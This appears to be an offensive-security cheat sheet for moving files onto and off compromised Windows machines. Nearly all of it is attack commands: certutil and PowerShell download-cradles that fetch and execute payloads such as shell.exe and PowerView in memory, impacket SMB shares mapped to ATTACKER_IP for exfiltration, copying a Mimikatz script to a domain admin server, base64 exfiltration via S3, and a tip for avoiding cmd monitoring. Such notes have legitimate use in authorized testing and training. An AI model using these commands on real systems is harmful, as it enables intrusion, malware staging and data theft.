File Transfer

ZIP Files

HFS -GUI Based Tool

Command-line based

certutil -urlcache -split -f C:\\users\\public\\shell.exe
certutil -urlcache -split -f C:\shell.exe & shell.exe

curl http://<URL/file.exe --output file.exe

upload /home/kali/Tools/Windows/nc.exe

#Powershell remoting
Copy-Item -ToSession $appsrv1 -Pathfile_to_copy.exe -Destination C:\Users\appadmin\Downloads


  • Attacker -- > Victim

#Attacker's System
#Shares current directory
sudo impacket-smbserver shared . 
sudo -smb2support Data $(pwd)

sudo python3 /opt/impacket/examples/ share . -smb2support -username user -password s3cureP@ssword
net use \\ATTACKER_IP\share /USER:user s3cureP@ssword 

net use \\ATTACKER_IP\share /del

#Victim's System
copy \\\shared\exploit.exe c:\users\public\file.exe

#Metasploit's smb_delivery

systemctl start smbd
    comment = hello
    path = /home/kali/shareddir
    guest ok = yes
    browsable = yes
    read only = no
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
  • Victim -- > Attacker

impacket-smbserver pub `pwd`
sudo -smb2support Data $(pwd) -user kali -password mypass

#Victim: Powershell
net use z: \\\pub /user:kali mypass
net use z: \\\pub
cp "File name.txt" z:

net z: /delete

sudo impacket-smbserver shared $(pwd) -smb2support -username kali -password mypass

$pass= convertto-securestring 'mypass' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kali',$pass)
New-PSDrive -Name "shared" -PSProvider "Filesystem" -Root "\\\shared" -Credential $cred 
net use z: \\\shared

#List mounted shares
Powershell: Get-SMBShare
Without Powershell: net share

Troubleshooting Common Errors

Via Web Server IEX(New-Object Net.WebClient).DownloadString(""); | powershell -noprofile -

powershell -c iex(new-object net.webclient).downloadstring(''); 
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<Source-IP/File>', '<Destination directory>')"

(new-object net.webclient).downloadfile('http://<Source-IP/File>', '<Destination directory>')

Invoke-WebRequest -Uri "http://<Source-IP/File>" -OutFile "PowerView.ps1"

#Execute in memory
IEX(iwr http://<IP>/PowerView.ps1 -UseBasicParsing) 

Exfil using Base64

Downloading Files Onto Compromised Host

S3 Bucket

  • Encode the file using certutil. certutil.exe -encode file.exe file.txt

  • Host the file on an S3 Bucket.

  • Access the file on using AWS S3 Bucket. Copy the content to a .txt file

  • Decode the file. certutil.exe -decode file.txt file.exe

    • Use powershell as cmd may be monitored.


If we have access to a windows machine with a valid user/credentials and this user is in the “Remote Desktop Users”, we can share a local directories as a mount volume through rdp itself once we connect to the machine:

rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries -u pelota -p /dynamic-resolution
xfreerdp /u:admin /p:password /cert:ignore /v: /workarea /drive:/localdir,share /dynamic-resolution +clipboard

Last updated